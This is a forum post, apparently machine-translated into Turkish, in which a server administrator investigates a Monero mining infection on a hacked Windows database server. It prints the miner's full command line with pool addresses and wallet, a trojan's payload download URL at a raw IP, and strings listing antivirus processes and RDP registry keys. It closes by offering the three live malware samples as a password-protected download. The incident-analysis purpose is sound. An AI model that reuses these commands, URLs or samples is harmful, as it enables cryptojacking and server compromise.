Dün öğleden sonra aniden web sitesinin açılamadığını fark ettim, nedenini kontrol ettim ve uzak veritabanı portunun açılamadığını fark ettim, bu yüzden uzak veritabanı sunucusuna giriş yaptım.
MySQL servisinin durduğunu ve CPU'nun %100 işgal ettiğini gördüm, aşağıdaki şekilde gösterildiği gibi:
CPU doluluk sıralamasında, "win1ogins.exe"nin en fazla kaynak tükettiği ve CPU'nun %73'ünü kapladığı tespit edildi; kişisel deneyime göre, bu madencilik yazılımı olmalı, yani XMR Monero madenciliği yapacak!
Ayrıca "MyBu.exe" Yiyu sürecini keşfettim ve düşündüm ki, sunucu Yiyu ile yazılmış programı ne zaman yükledi? Aşağıda gösterildiği gibi:
"MyBu.exe" tuşuna sağ tıklayarak dosya konumunu, klasör konumunu açın: C:\Windows, sonra zamana göre sıralayın ve aşağıda gösterildiği gibi 3 yeni dosya bulun:
1ndy.exe, MyBu.exe, Mzol.exe belgeler
Bu garip dosyaları görünce sunucunun hacklenmiş olması gerektiğini düşündüm, Windows kayıtlarına baktım ve giriş kayıtlarının silindiğini, sunucunun gerçekten hacklendiğini gördüm!
Sürecin üzerine "win1ogins.exe" tıklayarak dosya konumunu açmayı denedik ama açılamadı!! Tepki yok! Anlaşıldı! Araçlar!!
Kullandığım araç "PCHunter64.exe", kendiniz arayın ve indirin
"win1ogins.exe"nin bulunduğu klasör: C:\Windows\Fonts\system(x64)\ aşağıdaki şekilde gösterildiği gibi:
Bu klasörü aşağıda gösterildiği gibi Explorer'da bulamıyoruz:
Sonraki işlemde, yeni satın aldığım sunucuma 3 virüs Trojan dosyasını kopyalıyorum!!
Virüs dosyasını yeni satın aldığım sunucuya kopyaladım, sonra MyBu.exe dosyayı açmaya çalıştım ve MyBu.exe dosyanın kendi kendine silindiğini gördüm! Ve madencilik yazılımı yayınlandığında, explorer'ın dosya yolunu açamayacağını biliyoruz,
Windows'un yeni sürümüyle gelen powershell aracını denedik ve madencilik yazılımının var olduğunu, 3 klasör olduğunu gördük
(Normal koşullarda: C:\Windows\Fonts altında herhangi bir klasör yoktur!!)
Sunucuma FD paket yakalama aracını yükledim, "1ndy.exe" yazılımını açmaya çalıştık, bulduk ve erişim denedik: http://221.229.204.124:9622/9622.exe en son virüs Trojanını indirmesi gerekiyor
Şimdi web sitesi erişilemez.
"Mzol.exe" yazılımını açmaya çalıştık ve programın ne yapmak istediğini bilmediğini gördük. Programı Notpad ile açıyoruz, aşağıda gösterildiği gibi:
LogonServer.exe Oyun-satranç ve kartlar GameServer.exe Baidu'nun yumuşak öldürmesi BaiduSdSvc.exe S-U ServUDaemon.exe'yi patlatmada DUB.exe taramada 1433 taramasında 1433.exe tavuk yakalamada S.exe Microsoft Antivirüs mssecess.exe QUICK HEAL QUHLPSVC.EXE Dr. An V3 V3Svc.exe Dr. Ahn patray.exe Kore kapsülü AYAgent.aye Traffic Ore Miner.exe Trend TMBMSRV.exe Ke Niu knsdtray.exe QQ QQ.exe K7 Antivirüs K7TSecurity.exe QQ Computer Butler QQPCRTP.exe Kingsoft Guardian ksafe.exe Norton Antivirüs rtvscan.exe Avast Network Security ashDisp.exe Avira avcenter.exe Kingsoft kxetray.exe NOD32 egui.exe McCafe Mcshield.exe Rising Antivirüs RavMonD.exe Jiangmin Antivirüs KvMonXP.exe Kaspersky avp.exe 360 Antivirüs 360sd.exe 360 Security Guard 360tray.exe : %s:%d:%s F r i e n d l y N a m e SysFreeString Oleaut32.dll CoCreateInstance CoUninitialize CoInitialize Ole32.dll %d*%sMHz HARDWARE\DEscrip{filtering}tION\System\CentralProcessor\0 ~MHz c:\%s kernel32.dll IsWow64Process No Info SOFTWARE\Microsoft\Windows\CurrentVersion\Çalıştır C:\Windows\1ndy.exe descrip{filter}tion SYSTEM\CurrentControlSet\Services\%s RtlGetNtVersionNumbers ntdll.dll DİĞER bağlantılar YOĞUN bağlantılar PROXY bağlantılar LAN bağlantıları MODEM bağlantıları NULL CTXOPConntion_Class 3389 PortNumara SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s Keşfedilmedi Varsayılan RDP-TCP Yazar: Shi Yonggang, email:pizzq@sina.com
Kişisel olarak, "Mzol.exe" ve "1ndy.exe" aslında aynı şey, sadece yeni versiyon ile eski versiyon arasındaki fark!
win1ogins.exe aşağıda gösterildiği gibi yazılımın başlangıç parametrelerine bir göz atalım:
C:\Windows\Fonts\system(x64)\win1ogins.exe -a cryptonight -o stratum+tcp://pool.supportxmr.com:5555 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p MyBlue -o stratum+tcp://pool.minexmr.com:443 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p x -k --donate-level=1
Gerçekten XMR Monero madenciliği yaparsak, madencilik havuzu adresini açarız: https://supportxmr.com/ Cüzdanın adresini sorgulayın, aşağıdaki şekilde gösterildiği gibi:
Geliri hesaplama gücüne göre hesaplıyoruz, günde 0,42 madeni para çıkarıyoruz ve mevcut piyasaya göre 1.000'den fazla hesaplıyoruz, günlük gelir muhtemelen 500 yuan'dan fazla!
Tabii ki, Monero da 2.000 yuan'ın üzerine çıktı!
"win1ogins.exe" madencilik virüsünün nasıl kaldırılacağına gelince, PCHunter64 programı madencilik virüsünü manuel olarak kaldırabiliyor! Süreci durdurmak işe yaramıyor, sunucumdaki virüsü manuel olarak temizledim.
Tabii ki, virüsü ortadan kaldırmak için başkalarına bırakmak daha iyi, sonuçta ben bu konuda profesyonel değilim!
Son olarak, 3 virüs dosyası ekleyin ve şifreyi açın A123456
1ndy.zip
(1.29 MB, İndirme sayısı: 12, 售价: 1 粒MB)
(Son)
|
Yayınlandı 4.04.2018 12:37:15
|
|
|
|
